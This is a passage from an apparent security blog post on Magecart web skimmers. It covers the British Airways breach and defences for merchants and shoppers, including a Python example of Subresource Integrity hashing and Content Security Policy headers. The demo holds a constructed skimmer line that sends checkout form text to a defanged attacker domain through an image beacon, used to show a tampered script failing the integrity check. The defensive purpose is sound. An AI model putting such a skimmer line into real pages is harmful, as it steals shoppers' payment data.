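        print(f"{key}: {value}")
```

The Luhn check is what separates a real PAN from an order number or a phone number that happens to be sixteen digits, which matters when you are deciding whether a capture triggers card-brand notification.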

This kind of attack happens transparently to both the merchant and customer. In contrast to breaches that involve leaked databases where the information may be encrypted, web skimmers are able to collect your data in clear text and in real-time.

British Airways case

Between August and September 2018, British Airways suffered a Magecart attack for 15 days, which was highly targeted so as not to raise suspicions from site visitors or administrators.

A JavaScript library was tampered with and mixed into the payment flow in a way that blended it seamlessly into the background. In fact, the script itself was loaded in from the baggage claims information page and the attackers even paid for an SSL certificate for the server to which they sent stolen data. They could have used a free certificate like so many other scammers do, but they likely wanted to avoid red flags and make everything look as legitimate as possible. If they hadn’t taken so many precautions, they may well have been discovered a lot earlier.

In terms of data stolen, the attackers managed to claim both PII and payment details. The attack was so comprehensive that Magecart was even able to swipe data from mobile app users, due to portions of the site loading inside the app itself and the attackers ensuring they had a few pieces of mobile-specific code ready and waiting.

That they were able to pull off such an attack, with so much access to the British Airways site itself, is deeply alarming. It isn’t just payment information that airlines handle every day; it’s passport details, birthdates, and other incredibly personal information. Thankfully, British Airways confirmed that no travel data was taken. But in terms of potential fallout, including the inevitable post-attack data leaks and blackmail attempts, this attack above all others could have been catastrophic.


There is no silver bullet in preventing web-skimming attacks, but there are still measures that can be taken to mitigate the risks.

Merchants (server-side)

Operating an e-commerce website comes with certain responsibilities, especially if payment information is handled through it. It is usually a safer (and easier) practice to outsource the handling of financial transactions to larger, trusted parties. PCI compliance and risks associated with collecting data can be overwhelming, especially for site owners that would rather focus on the business side of things.

There are too many aspects of website security to cover here in how to keep your own site from getting hacked, so instead we will focus on a third-party compromise scenario.

Third-party resource integrity checking is a security measure that is often overlooked but can provide great benefits when loading external content. The reality is that a website usually cannot host all the content itself, and it makes more sense to rely on CDNs and other providers for speed and cost reasons.

This relationship does not have to mean inheriting every problem a third party experiences. While this post has focused on credit card stealers, a number of other threats can be disseminated via third-party libraries. Two safeguards help here: Subresource Integrity (SRI) lets the page pin a hash of each external script so the browser refuses to run a copy whose contents have changed, and Content Security Policy (CSP) restricts where scripts may be loaded from and where page data may be sent, which is what stops a skimmer from posting what it collects.
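As an added example (mine, not code from the post or from any vendor), the Python below computes the integrity value a merchant would pin a vendor script with, checks a fetched body against it the way a browser does, and builds a matching CSP header. The vendor script, the CDN and payment-provider host names and the appended skimmer tail are all constructed; the info-stat[.]ws domain is the one from the post, kept defanged.

```python
"""Subresource Integrity tokens and a matching CSP for third-party scripts."""
import base64
import hashlib

SRI_ALGOS = ("sha256", "sha384", "sha512")   # the only digests browsers accept for SRI


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Integrity token for a resource body: '<algo>-<base64 digest>'."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"SRI does not allow {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes) -> str:
    """The tag a merchant ships after pinning the vendor's script.
    crossorigin is mandatory: without it the browser cannot read a cross-origin body to hash it."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            'crossorigin="anonymous"></script>')


def verify_sri(content: bytes, integrity: str) -> bool:
    """What the browser does on load: the body passes if any listed token matches."""
    for token in integrity.split():
        algo = token.partition("-")[0]
        if algo in SRI_ALGOS and sri_hash(content, algo) == token:
            return True
    return False


def csp_header(script_hosts, connect_hosts) -> str:
    """A CSP that limits where scripts come from and where the page may send data.
    default-src also governs img-src, so an image-beacon exfil is blocked as well."""
    return ("Content-Security-Policy: default-src 'self'; "
            f"script-src 'self' {' '.join(script_hosts)}; "
            f"connect-src 'self' {' '.join(connect_hosts)}; "
            "form-action 'self'")


# Constructed vendor script, and the kind of tail a skimmer appends to it.
TRUSTED_LIB = (b"window.checkout = function (form) {\n"
               b"  return fetch('/pay', {method: 'POST', body: new FormData(form)});\n"
               b"};\n")
SKIMMED_LIB = TRUSTED_LIB + (
    b"new Image().src = 'https://info-stat[.]ws/?d=' + btoa(document.forms[0].innerText);\n")


def demo() -> dict:
    """Pin the clean script, then show the tampered copy failing the same check."""
    pinned = sri_hash(TRUSTED_LIB)
    return {
        "tag": script_tag("https://cdn.example.net/checkout.js", TRUSTED_LIB),
        "trusted_loads": verify_sri(TRUSTED_LIB, pinned),
        "skimmed_loads": verify_sri(SKIMMED_LIB, pinned),
        "csp": csp_header(["https://cdn.example.net"], ["https://api.example-psp.com"]),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The caveat a practitioner will hit immediately: SRI only works for resources whose bytes you control the release cadence of. A vendor script that legitimately changes under the same URL will break the page the moment it changes, so pin a versioned URL and treat every hash update as a change you review.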

Consumers (Client-side)

One thing to keep in mind as consumers is that we are largely placing our trust in the online stores where we are shopping. For this reason, it may be wise to avoid smaller sites that perhaps do not have the same level of security as larger ones. Of course, with cases like British Airways or Newegg, this piece of advice shows its limitations.

Browser extensions such as NoScript can stop JavaScript from loading from untrusted sites and so reduce the attack surface. They have the same shortcoming, however, when the malicious code is embedded in a resource that is already trusted.

Magecart and other web skimmers can also be mitigated at the exfiltration layer by blocking connections to the domains and IPs known to be used by the attackers. It is not foolproof, given how trivial it is to register new domains, but infrastructure reuse is something we still see quite often.

We will continue monitoring these threats and add related indicators of compromise (IOCs) to our database to protect our Malwarebytes customers.
